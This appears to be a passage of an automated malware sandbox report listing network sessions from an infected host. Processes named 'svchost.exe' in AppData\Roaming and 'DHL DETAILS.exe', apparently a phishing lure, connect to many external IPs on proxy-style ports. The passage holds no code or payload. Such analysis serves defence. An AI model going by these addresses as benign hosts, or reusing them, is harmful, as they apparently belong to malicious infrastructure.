6066	192.168.2.5	58096	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6067	192.168.2.5	58070	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6068	192.168.2.5	65194	162.241.50.179	35948	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6069	192.168.2.5	58095	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6070	192.168.2.5	64982	46.10.229.243	7777	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6071	192.168.2.5	64954	203.202.253.108	5020	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6072	192.168.2.5	65008	103.229.83.106	6789	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6073	192.168.2.5	65217	66.228.33.190	29566	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6074	192.168.2.5	58221	97.74.233.206	16744	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6075	192.168.2.5	52168	96.80.235.1	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6076	192.168.2.5	58117	110.74.195.239	51080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6077	192.168.2.5	65005	116.68.162.82	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6078	192.168.2.5	65063	138.197.148.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6079	192.168.2.5	58325	104.19.233.117	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6080	192.168.2.5	65140	146.56.146.5	48384	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6081	192.168.2.5	58275	74.119.144.60	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6082	192.168.2.5	58143	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6083	192.168.2.5	58161	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6084	192.168.2.5	52257	162.223.89.84	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6085	192.168.2.5	65300	147.124.212.31	13276	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6086	192.168.2.5	58170	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6087	192.168.2.5	58176	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6088	192.168.2.5	52375	77.65.50.118	34159	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6089	192.168.2.5	58300	195.248.243.149	7237	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6090	192.168.2.5	58565	199.102.106.94	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6091	192.168.2.5	58178	20.206.106.192	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6092	192.168.2.5	58463	172.67.209.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6093	192.168.2.5	58135	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6094	192.168.2.5	58238	202.131.65.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6095	192.168.2.5	52180	91.134.140.160	16487	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6096	192.168.2.5	52300	222.252.18.8	19132	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6097	192.168.2.5	58145	41.77.188.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6098	192.168.2.5	58215	8.222.239.209	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6099	192.168.2.5	65381	64.225.48.234	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6100	192.168.2.5	52303	163.172.147.89	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6101	192.168.2.5	52207	117.102.114.2	7890	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6102	192.168.2.5	56651	41.242.116.150	50003	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6103	192.168.2.5	58142	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6104	192.168.2.5	58354	107.181.148.227	6087	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6105	192.168.2.5	58339	213.202.230.241	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6106	192.168.2.5	58343	136.243.82.121	1082	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6107	192.168.2.5	58412	45.43.81.164	5811	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6108	192.168.2.5	58555	66.84.6.21	62645	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6109	192.168.2.5	56976	162.223.116.75	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6110	192.168.2.5	58310	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6111	192.168.2.5	58211	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6112	192.168.2.5	58367	118.218.126.54	9400	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6113	192.168.2.5	58322	139.59.1.14	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6114	192.168.2.5	58456	195.169.35.214	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6115	192.168.2.5	58459	8.217.143.187	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6116	192.168.2.5	65415	138.121.161.86	8190	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6117	192.168.2.5	57086	148.66.130.53	20870	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6118	192.168.2.5	58546	51.15.142.4	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6119	192.168.2.5	58444	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6120	192.168.2.5	58437	82.157.194.44	7890	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6121	192.168.2.5	65296	212.110.188.211	34409	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6122	192.168.2.5	58479	156.67.217.159	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6123	192.168.2.5	65438	193.239.58.92	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6124	192.168.2.5	53184	162.240.10.35	50463	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6125	192.168.2.5	58491	91.134.140.160	12217	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6126	192.168.2.5	58573	211.222.252.187	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6127	192.168.2.5	58571	47.106.112.207	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6128	192.168.2.5	58577	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6129	192.168.2.5	58594	104.19.120.84	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6130	192.168.2.5	52781	103.69.87.142	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6131	192.168.2.5	52741	185.191.236.162	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6132	192.168.2.5	57077	178.218.95.6	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6133	192.168.2.5	58572	183.215.23.242	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6134	192.168.2.5	65281	178.49.22.23	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6135	192.168.2.5	58438	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6136	192.168.2.5	52931	54.38.176.200	3679	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6137	192.168.2.5	52354	163.53.82.220	32650	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6138	192.168.2.5	52708	41.57.37.125	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6139	192.168.2.5	57132	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6140	192.168.2.5	56478	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6141	192.168.2.5	57643	137.184.100.135	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6142	192.168.2.5	53562	194.213.208.226	8180	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6143	192.168.2.5	53486	203.96.177.211	55005	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6144	192.168.2.5	57419	36.93.138.75	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6145	192.168.2.5	53031	161.35.83.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6146	192.168.2.5	57717	161.97.170.209	24606	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6147	192.168.2.5	53281	212.118.43.143	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6148	192.168.2.5	57795	94.131.106.196	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6149	192.168.2.5	57443	94.131.106.208	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6150	192.168.2.5	58578	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6151	192.168.2.5	65505	159.223.71.71	52542	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6152	192.168.2.5	58630	172.67.182.77	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6153	192.168.2.5	58278	117.160.250.163	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6154	192.168.2.5	58618	39.105.27.30	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6155	192.168.2.5	56298	112.5.33.179	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6156	192.168.2.5	53651	147.124.212.31	30508	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6157	192.168.2.5	58585	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6158	192.168.2.5	53308	154.0.14.116	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6159	192.168.2.5	57092	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6160	192.168.2.5	58355	117.160.250.133	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6161	192.168.2.5	58644	74.119.144.60	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6162	192.168.2.5	57486	211.93.2.190	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6163	192.168.2.5	57246	39.165.0.137	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6164	192.168.2.5	65521	187.40.1.123	128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6165	192.168.2.5	57805	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6166	192.168.2.5	57923	46.219.1.5	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6167	192.168.2.5	58626	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6168	192.168.2.5	49226	167.99.236.14	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6169	192.168.2.5	58628	187.40.1.122	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6170	192.168.2.5	57977	5.252.23.220	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6171	192.168.2.5	58639	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6172	192.168.2.5	58024	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6173	192.168.2.5	58643	139.129.202.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6174	192.168.2.5	53742	178.128.82.105	33225	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6175	192.168.2.5	57998	51.75.126.150	4228	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6176	192.168.2.5	58648	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6177	192.168.2.5	54027	162.241.6.97	44607	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6178	192.168.2.5	58660	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6179	192.168.2.5	58664	134.209.105.209	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6180	192.168.2.5	49416	142.54.228.193	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6181	192.168.2.5	58656	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6182	192.168.2.5	54244	88.202.230.103	17045	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6183	192.168.2.5	62665	54.38.176.200	3679	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6184	192.168.2.5	53859	154.239.9.94	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6185	192.168.2.5	58677	8.217.143.187	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6186	192.168.2.5	58681	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6187	192.168.2.5	58665	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6188	192.168.2.5	58684	211.222.252.187	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6189	192.168.2.5	58679	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6190	192.168.2.5	62648	220.121.137.183	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6191	192.168.2.5	58696	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6192	192.168.2.5	58126	64.227.106.157	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6193	192.168.2.5	58698	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6194	192.168.2.5	54819	50.63.12.33	61464	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6195	192.168.2.5	58237	174.136.57.169	33761	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6196	192.168.2.5	58097	216.137.184.253	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6197	192.168.2.5	58697	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6198	192.168.2.5	58711	202.142.159.204	31026	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6199	192.168.2.5	55101	161.97.163.52	64109	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6200	192.168.2.5	57953	184.170.249.65	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6201	192.168.2.5	58700	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6202	192.168.2.5	55055	51.89.173.40	17982	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6203	192.168.2.5	57930	72.195.34.58	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6204	192.168.2.5	54785	52.80.19.207	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6205	192.168.2.5	58153	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6206	192.168.2.5	58688	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6207	192.168.2.5	58168	47.90.126.78	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

